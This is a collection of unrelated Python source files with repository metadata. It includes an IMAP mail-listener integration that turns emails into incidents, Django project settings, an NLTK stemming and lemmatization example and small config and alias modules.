| 956
|
py
|
Python
|
signac/common/errors.py
|
shandave/signac
|
911d7eb1f475f501b2c21e47bbf00829a958147a
|
[
"BSD-3-Clause"
] | null | null | null |
signac/common/errors.py
|
shandave/signac
|
911d7eb1f475f501b2c21e47bbf00829a958147a
|
[
"BSD-3-Clause"
] | 106
|
2020-06-11T19:44:35.000Z
|
2022-03-01T13:01:09.000Z
|
signac/common/errors.py
|
daico007/signac
|
a20d815bd87af3d8992c71871071024062cada07
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017 The Regents of the University of Michigan
# All rights reserved.
# This software is licensed under the BSD 3-Clause License.
"""Errors raised by signac.common classes."""
from ..core.errors import Error
class ConfigError(Error, RuntimeError):
"""Error with parsing or reading a configuration file."""
pass
# this class is only used by deprecated features
class AuthenticationError(Error, RuntimeError):
"""Authentication error."""
def __str__(self):
if len(self.args) > 0:
return "Failed to authenticate with host '{}'.".format(self.args[0])
else:
return "Failed to authenticate with host."
# this class is only used by deprecated features
class ExportError(Error, RuntimeError):
"""Error exporting documents to a mirror."""
pass
# this class is only used by deprecated features
class FetchError(FileNotFoundError):
"""Error in fetching data."""
pass
| 25.837838
| 80
| 0.697699
|
eaa97f8c79bd04025e6c211373e028ba5f3b1146
| 2,471
|
py
|
Python
|
discord/state.py
|
nextcord-ext/nextcord
|
7b3022ae19299e1f40f5f34da33b80ae491aa06a
|
[
"MIT"
] | null | null | null |
discord/state.py
|
nextcord-ext/nextcord
|
7b3022ae19299e1f40f5f34da33b80ae491aa06a
|
[
"MIT"
] | null | null | null |
discord/state.py
|
nextcord-ext/nextcord
|
7b3022ae19299e1f40f5f34da33b80ae491aa06a
|
[
"MIT"
] | null | null | null |
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Copyright (c) 2021-present tag-epic
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
--------------
Aliased module. See the same file in the nextcord folder for more information.
Autogenerated by aliasgen.py
"""
from nextcord.state import (
AllowedMentions,
Any,
ApplicationFlags,
AutoShardedConnectionState,
BaseActivity,
Callable,
CategoryChannel,
ChannelType,
ChunkRequest,
ClientUser,
ConnectionState,
Coroutine,
DMChannel,
Deque,
Dict,
Emoji,
GroupChannel,
Guild,
GuildSticker,
Intents,
Interaction,
Invite,
List,
Member,
MemberCacheFlags,
Message,
Object,
Optional,
OrderedDict,
PartialEmoji,
PartialMessageable,
RawBulkMessageDeleteEvent,
RawIntegrationDeleteEvent,
RawMessageDeleteEvent,
RawMessageUpdateEvent,
RawReactionActionEvent,
RawReactionClearEmojiEvent,
RawReactionClearEvent,
RawTypingEvent,
Role,
Sequence,
StageChannel,
StageInstance,
Status,
StoreChannel,
TYPE_CHECKING,
TextChannel,
Thread,
ThreadMember,
Tuple,
TypeVar,
Union,
User,
View,
ViewStore,
VoiceChannel,
_channel_factory,
_integration_factory,
_log,
annotations,
asyncio,
copy,
datetime,
deque,
inspect,
itertools,
logging,
logging_coroutine,
os,
try_enum,
utils,
)
| 23.990291
| 78
| 0.717928
|
5cf33cd241e4c8aa395c08940cce8e71799fdd61
| 23,795
|
py
|
Python
|
Packs/MailListener/Integrations/MailListenerV2/MailListenerV2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799
|
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/MailListener/Integrations/MailListenerV2/MailListenerV2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317
|
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/MailListener/Integrations/MailListenerV2/MailListenerV2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297
|
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import ssl
from datetime import timezone
from typing import Any, Dict, Tuple, List, Optional
from dateparser import parse
from mailparser import parse_from_bytes
from imap_tools import OR
from imapclient import IMAPClient
import demistomock as demisto
from CommonServerPython import *
class Email(object):
def __init__(self, message_bytes: bytes, include_raw_body: bool, save_file: bool, id_: int) -> None:
"""
Initialize Email class with all relevant data
Args:
id_: The unique ID with which the email can be fetched from the server specifically
message_bytes: The raw email bytes
include_raw_body: Whether to include the raw body of the mail in the incident's body
save_file: Whether to save the .eml file of the incident's mail
"""
self.mail_bytes = message_bytes
try:
email_object = parse_from_bytes(message_bytes)
except UnicodeDecodeError as e:
demisto.info(f'Failed parsing mail from bytes: [{e}]\n{traceback.format_exc()}.'
'\nWill replace backslash and try to parse again')
message_bytes = self.handle_message_slashes(message_bytes)
email_object = parse_from_bytes(message_bytes)
self.id = id_
self.to = [mail_addresses for _, mail_addresses in email_object.to]
self.cc = [mail_addresses for _, mail_addresses in email_object.cc]
self.bcc = [mail_addresses for _, mail_addresses in email_object.bcc]
self.attachments = email_object.attachments
self.from_ = [mail_addresses for _, mail_addresses in email_object.from_][0]
self.format = email_object.message.get_content_type()
self.html = email_object.text_html[0] if email_object.text_html else ''
self.text = email_object.text_plain[0] if email_object.text_plain else ''
self.subject = email_object.subject
self.headers = email_object.headers
self.raw_body = email_object.body if include_raw_body else None
# According to the mailparser documentation the datetime object is in utc
self.date = email_object.date.replace(tzinfo=timezone.utc)
self.raw_json = self.generate_raw_json()
self.save_eml_file = save_file
self.labels = self._generate_labels()
@staticmethod
def handle_message_slashes(message_bytes: bytes) -> bytes:
"""
Handles the case where message bytes containing backslashes which needs escaping
Returns:
The message bytes after escaping
"""
# Input example # 1:
# message_bytes = b'\\U'
# Output example # 1 (added escaping for the slash):
# b'\\\\U'
#
# Input example # 2:
# message_bytes = b'\\\\U'
# Output example # 2 (no need to add escaping since the number of slashes is even):
# b'\\\\U'
regex = re.compile(rb'\\+U', flags=re.IGNORECASE)
def escape_message_bytes(m):
s = m.group(0)
if len(s) % 2 == 0:
# The number of slashes prior to 'u' is odd - need to add one backslash
s = b'\\' + s
return s
message_bytes = regex.sub(escape_message_bytes, message_bytes)
return message_bytes
def _generate_labels(self) -> List[Dict[str, str]]:
"""
Generates the labels needed for the incident
Returns:
A list of dicts with the form {type: <label name>, value: <label-value>}
"""
labels = [{'type': 'Email/headers', 'value': json.dumps(self.headers)},
{'type': 'Email/from', 'value': self.from_},
{'type': 'Email/format', 'value': self.format},
{'type': 'Email/text', 'value': self.text.strip()},
{'type': 'Email/subject', 'value': self.subject},
]
labels.extend([
{'type': f'Email/headers/{header_name}',
'value': header_value} for header_name, header_value in self.headers.items()
])
labels.extend([{'type': 'Email', 'value': mail_to} for mail_to in self.to])
labels.extend([{'type': 'Email/cc', 'value': cc_mail} for cc_mail in self.cc])
labels.extend([{'type': 'Email/bcc', 'value': bcc_mail} for bcc_mail in self.bcc])
if self.html:
labels.append({'type': 'Email/html', 'value': self.html.strip()})
if self.attachments:
labels.append({'type': 'Email/attachments',
'value': ','.join([attachment['filename'] for attachment in self.attachments])})
return labels
def parse_attachments(self) -> list:
"""
Writes the attachments of the files and returns a list of file entry details.
If self.save_eml_file is set, will also save the email itself as file
Returns:
A list of the written files entries
"""
files = []
for attachment in self.attachments:
payload = attachment.get('payload')
file_data = base64.b64decode(payload) if attachment.get('binary') else payload
# save the attachment
file_result = fileResult(attachment.get('filename'), file_data, attachment.get('mail_content_type'))
# check for error
if file_result['Type'] == entryTypes['error']:
demisto.error(file_result['Contents'])
files.append({
'path': file_result['FileID'],
'name': file_result['File']
})
if self.save_eml_file:
file_result = fileResult('original-email-file.eml', self.mail_bytes)
files.append({
'path': file_result['FileID'],
'name': file_result['File']
})
return files
def convert_to_incident(self) -> Dict[str, Any]:
"""
Convert an Email class instance to a demisto incident
Returns:
A dict with all relevant fields for an incident
"""
return {
'labels': self._generate_labels(),
'occurred': self.date.isoformat(),
'created': datetime.now(timezone.utc).isoformat(),
'details': self.text or self.html,
'name': self.subject,
'attachment': self.parse_attachments(),
'rawJSON': json.dumps(self.raw_json)
}
def generate_raw_json(self, parse_attachments: bool = False) -> dict:
"""
Args:
parse_attachments: whether to parse the attachments and write them to files
during the execution of this method or not.
"""
raw_json = {
'to': ','.join(self.to),
'cc': ','.join(self.cc),
'bcc': ','.join(self.bcc),
'from': self.from_,
'format': self.format,
'text': self.text,
'subject': self.subject,
'attachments': self.parse_attachments() if parse_attachments else ','.join(
[attachment['filename'] for attachment in self.attachments]),
'rawHeaders': self.parse_raw_headers(),
'headers': remove_empty_elements(self.headers)
}
if self.html:
raw_json['HTML'] = self.html
if self.raw_body:
raw_json['rawBody'] = self.raw_body
return raw_json
def parse_raw_headers(self) -> str:
"""
Parses the dict with the mail headers into a string representation
Returns:
            A string representation of the headers with the form <key>: <value>\n for all keys and values in the headers dict
"""
headers_string_lines = [f'{key}: {value}' for key, value in self.headers.items()]
return '\n'.join(headers_string_lines)
def fetch_incidents(client: IMAPClient,
last_run: dict,
first_fetch_time: str,
include_raw_body: bool,
with_headers: bool,
permitted_from_addresses: str,
permitted_from_domains: str,
delete_processed: bool,
limit: int,
save_file: bool
) -> Tuple[dict, list]:
"""
This function will execute each interval (default is 1 minute).
The search is based on the criteria of the SINCE time and the UID.
We will always store the latest email message UID that came up in the search, even if it will not be ingested as
incident (can happen in the first fetch where the email messages that were returned from the search are before the
value that was set in the first fetch parameter).
This is required because the SINCE criterion disregards the time and timezone (i.e. considers only the date),
so it might be that in the first fetch we will fetch only email messages that are occurred before the first fetch
time (could also happen that the limit parameter, which is implemented in the code and cannot be passed as a
criterion to the search, causes us to keep retrieving the same email messages in the search result)
The SINCE criterion will be sent only for the first fetch, and then the fetch will be by UID
We will continue using the first fetch time as it may take more than one fetch interval to get to the mail that
was actually received after the first fetch time
Args:
client: IMAP client
last_run: The greatest incident created_time we fetched from last fetch
first_fetch_time: If last_run is None then fetch all incidents since first_fetch_time
include_raw_body: Whether to include the raw body of the mail in the incident's body
with_headers: Whether to add headers to the search query
permitted_from_addresses: A string representation of list of mail addresses to fetch from
permitted_from_domains: A string representation list of domains to fetch from
delete_processed: Whether to delete processed mails
limit: The maximum number of incidents to fetch each time
save_file: Whether to save the .eml file of the incident's mail
Returns:
next_run: This will be last_run in the next fetch-incidents
incidents: Incidents that will be created in Demisto
"""
uid_to_fetch_from = last_run.get('last_uid', 1)
time_to_fetch_from = parse(last_run.get('last_fetch', f'{first_fetch_time} UTC'), settings={'TIMEZONE': 'UTC'})
mails_fetched, messages, uid_to_fetch_from = fetch_mails(
client=client,
include_raw_body=include_raw_body,
time_to_fetch_from=time_to_fetch_from,
limit=limit,
with_headers=with_headers,
permitted_from_addresses=permitted_from_addresses,
permitted_from_domains=permitted_from_domains,
save_file=save_file,
uid_to_fetch_from=uid_to_fetch_from
)
incidents = []
for mail in mails_fetched:
incidents.append(mail.convert_to_incident())
uid_to_fetch_from = max(uid_to_fetch_from, mail.id)
next_run = {'last_uid': uid_to_fetch_from}
if delete_processed:
client.delete_messages(messages)
return next_run, incidents
def fetch_mails(client: IMAPClient,
time_to_fetch_from: datetime = None,
with_headers: bool = False,
permitted_from_addresses: str = '',
permitted_from_domains: str = '',
include_raw_body: bool = False,
limit: int = 200,
save_file: bool = False,
message_id: int = None,
uid_to_fetch_from: int = 1) -> Tuple[list, list, int]:
"""
This function will fetch the mails from the IMAP server.
Args:
client: IMAP client
time_to_fetch_from: Fetch all incidents since first_fetch_time
include_raw_body: Whether to include the raw body of the mail in the incident's body
with_headers: Whether to add headers to the search query
permitted_from_addresses: A string representation of list of mail addresses to fetch from
permitted_from_domains: A string representation list of domains to fetch from
limit: The maximum number of incidents to fetch each time, if the value is -1 all
mails will be fetched (used with list-messages command)
save_file: Whether to save the .eml file of the incident's mail
message_id: A unique message ID with which a specific mail can be fetched
uid_to_fetch_from: The email message UID to start the fetch from as offset
Returns:
mails_fetched: A list of Email objects
messages_fetched: A list of the ids of the messages fetched
        last_message_in_current_batch: The UID of the last message fetched
"""
if message_id:
messages_uids = [message_id]
else:
messages_query = generate_search_query(time_to_fetch_from,
with_headers,
permitted_from_addresses,
permitted_from_domains,
uid_to_fetch_from)
demisto.debug(f'Searching for email messages with criteria: {messages_query}')
messages_uids = client.search(messages_query)[:limit]
mails_fetched = []
messages_fetched = []
demisto.debug(f'Messages to fetch: {messages_uids}')
for mail_id, message_data in client.fetch(messages_uids, 'RFC822').items():
message_bytes = message_data.get(b'RFC822')
        # Handles cases where message_bytes is returned as a string. If the conversion fails, the message_bytes returned by the server is used as-is.
try:
message_bytes = bytes(message_bytes)
except Exception as e:
demisto.debug(f"Converting data was un-successful. {mail_id=}, {message_data=}. Error: {e}")
if not message_bytes:
continue
email_message_object = Email(message_bytes, include_raw_body, save_file, mail_id)
if (not time_to_fetch_from or time_to_fetch_from < email_message_object.date) and \
int(email_message_object.id) > int(uid_to_fetch_from):
mails_fetched.append(email_message_object)
messages_fetched.append(email_message_object.id)
else:
demisto.debug(f'Skipping {email_message_object.id} with date {email_message_object.date}. '
f'uid_to_fetch_from: {uid_to_fetch_from}, first_fetch_time: {time_to_fetch_from}')
last_message_in_current_batch = uid_to_fetch_from
if messages_uids:
last_message_in_current_batch = messages_uids[-1]
return mails_fetched, messages_fetched, last_message_in_current_batch
def generate_search_query(time_to_fetch_from: Optional[datetime],
with_headers: bool,
permitted_from_addresses: str,
permitted_from_domains: str,
uid_to_fetch_from: int) -> list:
"""
    Generates a search query for the IMAP client 'search' method, with the permitted domains, email addresses and the
starting date from which mail should be fetched.
Input example #1:
time_to_fetch_from: datetime.datetime(2020, 8, 7, 12, 14, 32, 918634, tzinfo=datetime.timezone.utc)
with_headers: True
permitted_from_addresses: ['test1@mail.com']
permitted_from_domains: ['test1.com']
output example #1:
['OR',
'HEADER',
'FROM',
'test1.com',
'HEADER',
'FROM',
'test1@mail.com',
'SINCE',
datetime.datetime(2020, 8, 7, 12, 14, 32, 918634, tzinfo=datetime.timezone.utc)]
Input example #2:
time_to_fetch_from: datetime.datetime(2020, 8, 7, 12, 14, 32, 918634, tzinfo=datetime.timezone.utc)
with_headers: False
permitted_from_addresses: ['test1@mail.com']
permitted_from_domains: ['test1.com']
output example #2:
['OR',
'FROM',
'test1.com',
'FROM',
'test1@mail.com',
'SINCE',
datetime.datetime(2020, 8, 7, 12, 14, 32, 918634, tzinfo=datetime.timezone.utc)]
Args:
time_to_fetch_from: The greatest incident created_time we fetched from last fetch
with_headers: Whether to add headers to the search query
        permitted_from_addresses: A string representation of a list of mail addresses to fetch from
        permitted_from_domains: A string representation of a list of domains to fetch from
uid_to_fetch_from: The email message UID to start the fetch from as offset
Returns:
A list with arguments for the email search query
"""
permitted_from_addresses_list = argToList(permitted_from_addresses)
permitted_from_domains_list = argToList(permitted_from_domains)
messages_query = ''
if permitted_from_addresses_list + permitted_from_domains_list:
messages_query = OR(from_=permitted_from_addresses_list + permitted_from_domains_list).format()
# Removing Parenthesis and quotes
messages_query = messages_query.strip('()').replace('"', '')
if with_headers:
messages_query = messages_query.replace('FROM', 'HEADER FROM')
# Creating a list of the OR query words
messages_query_list = messages_query.split()
if time_to_fetch_from:
messages_query_list += ['SINCE', time_to_fetch_from] # type: ignore[list-item]
if uid_to_fetch_from:
messages_query_list += ['UID', f'{uid_to_fetch_from}:*']
return messages_query_list
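# Illustrative call (the values are hypothetical) showing the full query the fetch
# uses, including the UID offset appended after the OR/FROM/SINCE parts:
#
#   generate_search_query(time_to_fetch_from=datetime(2020, 8, 7, tzinfo=timezone.utc),
#                         with_headers=False,
#                         permitted_from_addresses='test1@mail.com',
#                         permitted_from_domains='test1.com',
#                         uid_to_fetch_from=17)
#
# would yield a list like:
#   ['OR', 'FROM', 'test1.com', 'FROM', 'test1@mail.com',
#    'SINCE', datetime(2020, 8, 7, tzinfo=timezone.utc), 'UID', '17:*']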
def test_module(client: IMAPClient) -> str:
yesterday = parse('1 day UTC')
client.search(['SINCE', yesterday])
return 'ok'
def list_emails(client: IMAPClient,
first_fetch_time: str,
with_headers: bool,
permitted_from_addresses: str,
permitted_from_domains: str) -> CommandResults:
"""
    Lists all emails that can be fetched with the given configuration and returns a preview version of them.
Args:
client: IMAP client
first_fetch_time: Fetch all incidents since first_fetch_time
with_headers: Whether to add headers to the search query
        permitted_from_addresses: A string representation of a list of mail addresses to fetch from
        permitted_from_domains: A string representation of a list of domains to fetch from
Returns:
The Subject, Date, To, From and ID of the fetched mails wrapped in command results object.
"""
fetch_time = parse(f'{first_fetch_time} UTC')
mails_fetched, _, _ = fetch_mails(client=client,
time_to_fetch_from=fetch_time,
with_headers=with_headers,
permitted_from_addresses=permitted_from_addresses,
permitted_from_domains=permitted_from_domains)
results = [{'Subject': email.subject,
'Date': email.date.isoformat(),
'To': email.to,
'From': email.from_,
'ID': email.id} for email in mails_fetched]
return CommandResults(outputs_prefix='MailListener.EmailPreview',
outputs_key_field='ID',
outputs=results)
def get_email(client: IMAPClient, message_id: int) -> CommandResults:
mails_fetched, _, _ = fetch_mails(client, message_id=message_id)
mails_json = [mail.generate_raw_json(parse_attachments=True) for mail in mails_fetched]
return CommandResults(outputs_prefix='MailListener.Email',
outputs_key_field='ID',
outputs=mails_json)
def get_email_as_eml(client: IMAPClient, message_id: int) -> dict:
mails_fetched, _, _ = fetch_mails(client, message_id=message_id)
mail_file = [fileResult('original-email-file.eml', mail.mail_bytes) for mail in mails_fetched]
return mail_file[0] if mail_file else {}
def _convert_to_bytes(data) -> bytes:
demisto.debug("Converting data to bytes.")
bytes_data = bytes(data)
demisto.debug("Converted data successfully.")
return bytes_data
def main():
params = demisto.params()
mail_server_url = params.get('MailServerURL')
port = int(params.get('port'))
folder = params.get('folder')
username = demisto.params().get('credentials').get('identifier')
password = demisto.params().get('credentials').get('password')
verify_ssl = not params.get('insecure', False)
tls_connection = params.get('TLS_connection', True)
include_raw_body = demisto.params().get('Include_raw_body', False)
permitted_from_addresses = demisto.params().get('permittedFromAdd', '')
permitted_from_domains = demisto.params().get('permittedFromDomain', '')
with_headers = params.get('with_headers')
delete_processed = demisto.params().get("delete_processed", False)
limit = min(int(demisto.params().get('limit', '50')), 200)
save_file = params.get('save_file', False)
first_fetch_time = demisto.params().get('first_fetch', '3 days').strip()
ssl_context = ssl.create_default_context()
args = demisto.args()
if not verify_ssl:
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
LOG(f'Command being called is {demisto.command()}')
try:
with IMAPClient(mail_server_url, ssl=tls_connection, port=port, ssl_context=ssl_context) as client:
client.login(username, password)
client.select_folder(folder)
if demisto.command() == 'test-module':
result = test_module(client)
demisto.results(result)
elif demisto.command() == 'mail-listener-list-emails':
return_results(list_emails(client=client,
first_fetch_time=first_fetch_time,
with_headers=with_headers,
permitted_from_addresses=permitted_from_addresses,
permitted_from_domains=permitted_from_domains))
elif demisto.command() == 'mail-listener-get-email':
return_results(get_email(client=client,
message_id=args.get('message-id')))
elif demisto.command() == 'mail-listener-get-email-as-eml':
return_results(get_email_as_eml(client=client,
message_id=args.get('message-id')))
elif demisto.command() == 'fetch-incidents':
next_run, incidents = fetch_incidents(client=client, last_run=demisto.getLastRun(),
first_fetch_time=first_fetch_time,
include_raw_body=include_raw_body,
with_headers=with_headers,
permitted_from_addresses=permitted_from_addresses,
permitted_from_domains=permitted_from_domains,
delete_processed=delete_processed, limit=limit,
save_file=save_file)
demisto.setLastRun(next_run)
demisto.incidents(incidents)
except Exception as e:
return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 46.384016
| 125
| 0.624837
|
923981d45eada08a99e1be05199a0c9e8d63807b
| 3,305
|
py
|
Python
|
django-hosting-heroku/source_code_step_8/portfolio-project/portfolio/settings.py
|
syberflea/materials
|
54f44725b40edf00c1b523d7a85b34a85014d7eb
|
[
"MIT"
] | 3,682
|
2018-05-07T19:45:24.000Z
|
2022-03-31T15:19:10.000Z
|
django-hosting-heroku/source_code_step_8/portfolio-project/portfolio/settings.py
|
sribarrow/materials
|
c17c4a4d6f8487e59eac1df8c88ca92b73d6d2a5
|
[
"MIT"
] | 148
|
2018-05-15T21:18:49.000Z
|
2022-03-21T11:25:39.000Z
|
django-hosting-heroku/source_code_step_8/portfolio-project/portfolio/settings.py
|
sribarrow/materials
|
c17c4a4d6f8487e59eac1df8c88ca92b73d6d2a5
|
[
"MIT"
] | 5,535
|
2018-05-25T23:36:08.000Z
|
2022-03-31T16:55:52.000Z
|
"""
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# SECRET_KEY = 'django-insecure-=bad%3%tbrw8(ohgu2uyi7)acv!$1br3=j-o)i@b+1d9g-sd1('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "portfolio.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "portfolio.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": BASE_DIR / "db.sqlite3",
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = "/static/"
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
import django_heroku
django_heroku.settings(locals())
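# django_heroku.settings(locals()) adjusts the settings above for Heroku; among other
# things it reads the DATABASE_URL config var and replaces DATABASES["default"].
# A rough manual equivalent (a sketch, assuming the dj-database-url package) would be:
#
#   import dj_database_url
#   DATABASES["default"] = dj_database_url.config(
#       default="sqlite:///" + str(BASE_DIR / "db.sqlite3"),
#       conn_max_age=600,
#   )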
| 25.620155
| 91
| 0.70348
|
678cb203c531e84262cace95f461490fb246560f
| 1,034
|
py
|
Python
|
nlp/text_processing.py
|
innaiivanova/chatbot
|
03ed98dfc24b36620db96094e8970a48010a9379
|
[
"MIT"
] | null | null | null |
nlp/text_processing.py
|
innaiivanova/chatbot
|
03ed98dfc24b36620db96094e8970a48010a9379
|
[
"MIT"
] | null | null | null |
nlp/text_processing.py
|
innaiivanova/chatbot
|
03ed98dfc24b36620db96094e8970a48010a9379
|
[
"MIT"
] | null | null | null |
# Codecademy's text processing
# Inna I. Ivanova
# regex for removing punctuation!
import re
# nltk preprocessing magic
import nltk
from nltk.tokenize import word_tokenize
from nltk.stem import PorterStemmer
from nltk.stem import WordNetLemmatizer
# grabbing a part of speech function:
from part_of_speech import get_part_of_speech
text = "So many squids are jumping out of suitcases these days that you can barely go anywhere without seeing one burst forth from a tightly packed valise. I went to the dentist the other day, and sure enough I saw an angry one jump out of my dentist's bag within minutes of arriving. She hardly even noticed."
cleaned = re.sub(r'\W+', ' ', text)
tokenized = word_tokenize(cleaned)
stemmer = PorterStemmer()
stemmed = [stemmer.stem(token) for token in tokenized]
## -- CHANGE these -- ##
lemmatizer = WordNetLemmatizer()
lemmatized = [lemmatizer.lemmatize(token,get_part_of_speech(token)) for token in tokenized]
print("Stemmed text:")
print(stemmed)
print("\nLemmatized text:")
print(lemmatized)
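# get_part_of_speech is imported from part_of_speech.py, which is not shown here.
# A plausible sketch of such a helper (an assumption, not the actual module): count
# how often WordNet lists the word under each part of speech and hand the most
# common tag to the lemmatizer, defaulting to noun.
#
#   from collections import Counter
#   from nltk.corpus import wordnet
#
#   def get_part_of_speech(word):
#       pos_counts = Counter(
#           synset.pos() for synset in wordnet.synsets(word)
#           if synset.pos() in ("n", "v", "a", "r")
#       )
#       return pos_counts.most_common(1)[0][0] if pos_counts else "n"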
| 34.466667
| 310
| 0.779497
|
a6f95160a321b5ee7ecf20688e9f38ec4cc42de6
| 574
|
py
|
Python
|
otcore/hit/migrations/0006_auto_20160520_1810.py
|
NYULibraries/dlts-enm-tct-backend
|
07455a660fb2cb8bc91a54f7f12d150923678157
|
[
"Apache-2.0"
] | null | null | null |
otcore/hit/migrations/0006_auto_20160520_1810.py
|
NYULibraries/dlts-enm-tct-backend
|
07455a660fb2cb8bc91a54f7f12d150923678157
|
[
"Apache-2.0"
] | 2
|
2017-10-30T21:19:07.000Z
|
2017-10-31T18:06:30.000Z
|
otcore/hit/migrations/0006_auto_20160520_1810.py
|
NYULibraries/dlts-enm-tct-backend
|
07455a660fb2cb8bc91a54f7f12d150923678157
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-20 22:10
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('hit', '0005_auto_20160519_1412'),
]
operations = [
migrations.AlterField(
model_name='hit',
name='basket',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='topic_name', to='hit.Basket'),
),
]
| 26.090909
| 148
| 0.65331
|
7f4c27af05ccdd9010728e67532f5c8a7b28c57e
| 57
|
py
|
Python
|
tia/analysis/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 366
|
2015-01-21T21:57:23.000Z
|
2022-03-29T09:11:24.000Z
|
tia/analysis/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 51
|
2015-03-01T14:20:44.000Z
|
2021-08-19T15:46:51.000Z
|
tia/analysis/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 160
|
2015-02-22T07:16:17.000Z
|
2022-03-29T13:41:15.000Z
|
import tia.analysis.perf
from tia.analysis.model import *
| 28.5
| 32
| 0.824561
|
512f8877613a414c7394fc69ec1ec1bffcc0907d
| 451
|
py
|
Python
|
config.py
|
VigneshTirukkonda/dig1ts
|
3b3ca56863f974a5386e9dad5acf8d909e5086db
|
[
"MIT"
] | null | null | null |
config.py
|
VigneshTirukkonda/dig1ts
|
3b3ca56863f974a5386e9dad5acf8d909e5086db
|
[
"MIT"
] | null | null | null |
config.py
|
VigneshTirukkonda/dig1ts
|
3b3ca56863f974a5386e9dad5acf8d909e5086db
|
[
"MIT"
] | null | null | null |
# TRAIN_PATH = '/Users/roshantirukkonda/Desktop/Kaggle /Pytorch CNN MNIST/Input/MNIST/processed/training.pt'
# TEST_PATH = '/Users/roshantirukkonda/Desktop/Kaggle /Pytorch CNN MNIST/Input/MNIST/processed/test.pt'
ROOT = '../Input'
MODEL_PATH = '../Input/Model'
LATEST_MODEL = '/CNN-2021-02-26 02:47:01.247436.pt'
TEST_PATH = '../Input/TEST'
EPOCHS = 5
SPLIT = [60000, 0]
IMG_DIM = 28, 28
BATCH_SIZE = 8
NUM_CLASSES = 10
LR = 0.001
MOMENTUM = 0.9
| 23.736842
| 108
| 0.718404
|
aa28f5725222cf0ad073b343b15ec3efb7d2772d
| 9,021
|
py
|
Python
|
opsi/modules/color.py
|
